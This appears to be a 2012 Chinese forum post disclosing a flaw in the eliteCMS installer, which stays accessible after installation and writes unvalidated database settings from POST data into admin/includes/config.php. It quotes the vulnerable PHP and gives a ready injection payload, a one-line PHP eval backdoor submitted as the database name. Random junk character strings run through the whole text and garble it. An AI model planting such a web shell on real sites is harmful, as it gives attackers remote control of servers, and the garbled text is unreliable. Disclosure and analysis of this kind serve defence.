eliteCMS的安装程序安装结束后未作锁定,导致黑客可以通过访问安装程序地址进行重复安装% J( @) B* l4 j# Q) c) U: Y) C
9 n7 y! N' @% V5 P) w: I9 b' P另外一个漏洞是安装程序可以直接写入一句话到admin/includes/config.php' h3 r1 d. w6 G+ B5 S- h3 i4 ?; n
我们来看代码:8 A4 s* S" [0 h! ?9 } n
8 ^" |- a6 L3 m, ^ d...
0 h$ O! I% D; A5 o9 E$ _7 t& z2 yelseif ($_GET['step'] == "4") {8 q* N( s' [% k+ u: _
$file = "../admin/includes/config.php";& N' X* j0 w+ H. z5 c
$write = "<?php\n";
0 `# b) W, h! N) m: k9 K$ q $write .= "/**\n";! w2 g& s0 ]7 c4 k0 N
$write .= "*\n";
$ E! ^1 C( d" h/ \" t $write .= "*eliteCMS-The LightweightCMS Copyright 2008 elite-graphix.net.\n";
3 C9 g/ ]( U2 b9 B8 J...略...4 K4 k- ^; ?" k
$write .= "*\n";, p2 Z5 B/ c$ E- P0 m; E6 \* x1 h
$write .= "*/\n";
. W- |1 M r% y [! e/ Z: z j; d $write .= "\n";
3 J& G5 |5 _2 H $write .= "define(\"DB_SERVER\", \"{$_SESSION['DB_SERVER']}\");\n";
" P$ _8 r7 N6 m7 I $write .= "define(\"DB_NAME\", \"{$_SESSION['DB_NAME']}\");\n";
, I# q! h$ N u% ~; R $write .= "define(\"DB_USER\", \"{$_SESSION['DB_USER']}\");\n";9 T4 M1 n( @2 }3 e! r% G" \
$write .= "define(\"DB_PASS\", \"{$_SESSION['DB_PASS']}\");\n";4 R' ~4 z5 i D* c1 X+ t
$write .= "\$connection = mysql_connect(DB_SERVER, DB_USER, DB_PASS);\n";
- Z0 N9 d' e7 }) S $write .= "if (!\$connection) {\n";
" t# i0 a7 g8 _! |( g1 W $write .= " die(\"Database connection failed\" .mysql_error());\n";
7 X) K# ~, N9 x ]7 \5 @! c& O $write .= " \n";: ?- s" q! |7 G R
$write .= "} \n";. G1 c1 g4 }; i
$write .= "\$db_select = mysql_select_db(DB_NAME, \$connection);\n";) Y. B% ?, ~5 I0 `9 B3 K$ _
$write .= "if (!\$db_select) {\n";
% N2 F9 X! b1 `* L H) f5 L $write .= " die(\"Database select failed\" .mysql_error());\n";7 n" U6 G- B( F& ~$ v5 ?% ~
$write .= " \n";; m7 k5 ~9 V6 |9 q
$write .= "} \n";
9 ]8 x/ Q$ d8 \1 F' z6 _ $write .= "?>\n";
$ d. Y7 ^* a% U1 \& U' r- ~ 7 E f/ @7 R. d* ~1 o: N
$writer = fopen($file, 'w');
. z7 Y, p0 p) j8 W4 J...0 M- ~7 a1 M( g3 o0 G
3 }% g1 B5 h: J" m/ M: Z/ z. l
在看代码:
; ?" {4 \+ C% l# H- e
- K- z0 k) e: D" U, Y8 @1 I$_SESSION['DB_SERVER'] = $_POST['DB_SERVER'];
5 t9 F+ U+ R) |: {$_SESSION['DB_NAME'] = $_POST['DB_NAME'];
( H* u2 e$ f: m$ l8 |9 Y$_SESSION['DB_USER'] = $_POST['DB_USER'];
- R+ x& }9 z8 M c. N! ^, `2 g$_SESSION['DB_PASS'] = $_POST['DB_PASS'];
) Y0 F9 M1 _6 u$ K7 Q; ?
+ y9 q& H y" W取值未作任何验证
# x( a$ [3 Y: f. w7 D* L如果将数据库名POST数据:; j& d! l/ i d; ~
; x; G _/ T7 r& p"?><?php eval($_POST[c]);?><?php
" F! f. C8 l% i; |, R * E; @; G7 `& o ~1 E. {0 r5 [# [
将导致一句话后门写入/admin/includes/config.php
, r$ X3 C9 Q9 K |
发表于 2012-11-18 13:59:27
收藏
支持
反对